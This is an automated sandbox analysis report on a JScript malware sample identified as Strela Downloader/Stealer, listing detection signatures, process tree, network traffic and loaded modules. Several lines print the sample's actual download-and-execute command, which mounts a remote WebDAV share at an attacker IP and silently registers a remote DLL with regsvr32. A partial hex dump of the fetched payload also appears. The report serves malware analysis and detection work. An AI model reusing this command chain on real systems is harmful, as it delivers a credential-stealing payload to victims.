Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
126484723232027823.js

Overview

General Information

Sample name:126484723232027823.js
Analysis ID:1576785
MD5:09024cb4c452f96fe5b6045e198092ba
SHA1:53f924039e79576a5b2e9b90e3c11c1116e933eb
SHA256:0ff304716b215d4fadbf9fee1be5d717c454a09f6bdbe6e42e29995d969964e8
Tags:jsStrelaStealeruser-lowmal3
Infos:

Detection

Strela Downloader, Strela Stealer
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Yara detected Strela Stealer
Gathers information about network shares
Opens network shares
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6672 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6948 cmdline: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6548 cmdline: cmd /c net use \\193.143.1.231@8888\davwwwroot\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • net.exe (PID: 3944 cmdline: net use \\193.143.1.231@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • cmd.exe (PID: 1020 cmdline: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • regsvr32.exe (PID: 5640 cmdline: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2209329233.0000000002201000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
    0000000B.00000002.2209539224.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmpJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security
      Process Memory Space: wscript.exe PID: 6672JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
        Process Memory Space: regsvr32.exe PID: 5640JoeSecurity_StrelaStealerYara detected Strela StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.2.regsvr32.exe.7ff8b7e00000.0.unpackJoeSecurity_StrelaStealerYara detected Strela StealerJoe Security

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6672.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 6672, ProcessName: wscript.exe
              Sigma detected: Communication To Uncommon Destination Ports
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 193.143.1.231, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 3944, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
              Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6672, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 6948, ProcessName: cmd.exe
              Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1020, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll, ProcessId: 5640, ProcessName: regsvr32.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js", ProcessId: 6672, ProcessName: wscript.exe
              Sigma detected: System Network Connections Discovery Via Net.EXE
              Source: Process startedAuthor: frack113: Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6548, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 3944, ProcessName: net.exe
              Sigma detected: Windows Share Mount Via Net.EXE
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\193.143.1.231@8888\davwwwroot\, CommandLine: net use \\193.143.1.231@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: cmd /c net use \\193.143.1.231@8888\davwwwroot\, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6548, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\193.143.1.231@8888\davwwwroot\, ProcessId: 3944, ProcessName: net.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              Networking

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 8888
              Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49709
              Source: global trafficTCP traffic: 192.168.2.5:49704 -> 193.143.1.231:8888
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Tue, 17 Dec 2024 14:16:14 GMTContent-Type: application/octet-streamContent-Length: 418816Connection: keep-aliveAccept-Ranges: bytesEtag: "1811fc5bc5a4e37266400"Last-Modified: Tue, 17 Dec 2024 14:13:22 GMTData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 04 00 19 51 61 67 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0e 00 00 d2 00 00 00 8e 05 00 00 00 00 00 f0 12 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 04 00 00 00 00 00 00 02 00 60 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 f0 00 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 11 d1 00 00 00 10 00 00 00 d2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 78 00 00 00 00 f0 00 00 00 02 00 00 00 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 88 05 00 00 00 01 00 00 8a 05 00 00 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 18 00 00 00 00 90 06 00 00 02 00 00 00 62 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: Joe Sandbox ViewASN Name: BITWEB-ASRU BITWEB-ASRU
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: unknownTCP traffic detected without corresponding DNS query: 193.143.1.231
              Source: global trafficHTTP traffic detected: GET /140341625623863.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: 193.143.1.231:8888
              Source: net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231/
              Source: net.exe, 00000005.00000002.2130413282.00000178B0F95000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000003.2049998000.00000178B0F5D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/
              Source: net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/%=1
              Source: net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/-=9
              Source: net.exe, 00000005.00000002.2130413282.00000178B0F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888//
              Source: net.exe, 00000005.00000003.2050785619.00000178B0F37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.143.1.231:8888/y=M

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Yara detected Strela Downloader
              Source: Yara matchFile source: amsi64_6672.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6672, type: MEMORYSTR

              System Summary

              barindex
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02209A3011_2_02209A30
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0220BDB011_2_0220BDB0
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0223DA0011_2_0223DA00
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02242B2811_2_02242B28
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02236F3011_2_02236F30
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0223A39111_2_0223A391
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_022498E811_2_022498E8
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_022429A411_2_022429A4
              Source: 126484723232027823.jsInitial sample: Strings found which are bigger than 50
              Source: classification engineClassification label: mal84.rans.troj.spyw.evad.winJS@12/0@0/1
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_03
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\126484723232027823.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.231@8888\davwwwroot\Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\net.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\regsvr32.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior

              Data Obfuscation

              barindex
              JScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("cmd /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s", "0", "false")
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0224B68A push esp; iretd 11_2_0224B691
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0224EEFE push ecx; retf 003Fh11_2_0224EF5E

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 8888
